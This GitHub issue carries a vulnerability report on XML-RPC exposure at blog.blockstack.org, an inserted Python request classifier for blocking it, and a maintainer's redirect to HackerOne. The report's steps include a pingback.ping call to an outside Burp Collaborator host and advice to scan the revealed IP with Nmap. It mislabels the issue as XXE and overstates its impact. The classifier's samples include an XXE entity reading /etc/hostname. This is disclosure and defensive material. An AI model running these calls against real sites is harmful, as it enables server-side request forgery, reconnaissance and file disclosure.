stacks-network / stacks-core

The Stacks blockchain implementation
https://docs.stacks.co
GNU General Public License v3.0

XML RPC File Enabled in https://blog.blockstack.org/ leading to DDOS Attacks #1823

Closed robertaaron1999 closed 4 years ago

robertaaron1999 commented 4 years ago

VULNERABILITY DESCRIPTION

This is a vulnerability which can lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

VULNERABILITY NAME

XML EXTERNAL ENTITY PROCESSING (Domain: https://blog.blockstack.org/)

SEVERITY

Medium

DESCRIPTION

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

STEPS TO REPRODUCE

1) Go to https://blog.blockstack.org/xmlrpc.php
2) You will see "XML-RPC Server accepts POST requests only"
3) Reload the page and capture the request in Burp Suite
4) Send the request to Repeater, replace "GET" with "POST" and click Go
5) You will notice an HTTP 200 OK response
6) Remove the cookie data and add the method below

system.listMethods

7) You will notice all the methods displayed in the response (the pingback method is also displayed). Critical

8) Now start the Burp Collaborator, take the blog URL from the website, paste it into this code and run it:

pingback.ping http://0lmlnzg4hhu11dslm6fsltrj9af03p.burpcollaborator.net https://blog.blockstack.org/

At the Burp Collaborator you will receive the DNS pingback, where you can see the server-side IP address. Now go to whatismyipaddress.com, select IP lookup and enter the found server-side IP, and you will be able to see the geographical location of the server and all important information about the server. You can use tools like Nmap to scan the IP found and hence gain all the critical information.

IMPACT:

This attack may lead to remote code injection, disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

For more information: https://www.hostinger.com/tutorials/xmlrpc-wordpress

RECOMMENDED FIX

1) Disabling xmlrpc.php with plugins (plugin name: "Disable XML-RPC")
2) Disabling xmlrpc.php manually

POC (video and screenshot attached)

Name: Robert Aaron
Phone: +971525284648
Handle: https://www.linkedin.com/in/robert-aaron-14735b188/
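Added example (not from the report or the stacks-core project): a request classifier a site operator could run at a reverse proxy or WAF in front of xmlrpc.php, turning the two calls quoted above (system.listMethods and pingback.ping with an outside source URL) into a block decision and also rejecting bodies carrying DOCTYPE/ENTITY declarations, which XML-RPC never needs. The method names are WordPress' real XML-RPC methods; the deny policy and the sample bodies are assumptions of this example.

```python
"""Classify inbound WordPress XML-RPC bodies: allow, or block with a reason."""
import xmlrpc.client
from urllib.parse import urlsplit

# Methods that hand an outsider reconnaissance (method enumeration) or make the
# server issue outbound requests (pingback). Policy is an assumption of this example.
DENIED_METHODS = {
    "system.listMethods", "system.multicall", "system.getCapabilities",
    "pingback.ping", "pingback.extensions.getPingbacks",
}


def classify_xmlrpc(body) -> tuple[str, str]:
    """Return ("allow" | "block", reason) for one XML-RPC request body."""
    if isinstance(body, str):
        body = body.encode()
    # XML-RPC has no use for DTDs; a DOCTYPE or ENTITY here is the XXE pattern
    # the report's title refers to, so drop it before any parser sees it.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return "block", "DOCTYPE/ENTITY declaration in XML-RPC body"
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception as exc:  # malformed XML or non-XML-RPC payload
        return "block", f"unparseable body: {exc.__class__.__name__}"
    if method is None:
        return "block", "no methodName in request"
    if method in DENIED_METHODS:
        detail = ""
        if method == "pingback.ping" and params:
            # First param is the sourceURI the server would fetch: the SSRF vector.
            detail = f" (would fetch host {urlsplit(str(params[0])).hostname})"
        return "block", f"method {method} is denied{detail}"
    return "allow", f"method {method} permitted"


def sample_bodies() -> dict:
    """Constructed request bodies mirroring the report, built with the stdlib marshaller."""
    return {
        "enumerate": xmlrpc.client.dumps((), "system.listMethods"),
        "pingback": xmlrpc.client.dumps(
            ("http://collaborator.example/", "https://blog.blockstack.org/"), "pingback.ping"),
        "xxe": "<!DOCTYPE x [<!ENTITY e SYSTEM 'file:///etc/hostname'>]>"
               "<methodCall><methodName>demo.sayHello</methodName></methodCall>",
        "benign": xmlrpc.client.dumps((), "demo.sayHello"),  # WordPress demo method
    }


if __name__ == "__main__":
    for name, body in sample_bodies().items():
        print(f"{name:10} -> {classify_xmlrpc(body)}")
```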

diwakergupta commented 4 years ago

Thanks @robertaaron1999, please use hackerone.com/blockstack for any security disclosures. In any case this issue is not relevant to stacks-blockchain.

cc/ @cuevasm FYI w.r.t XML-RPC on our WP setup.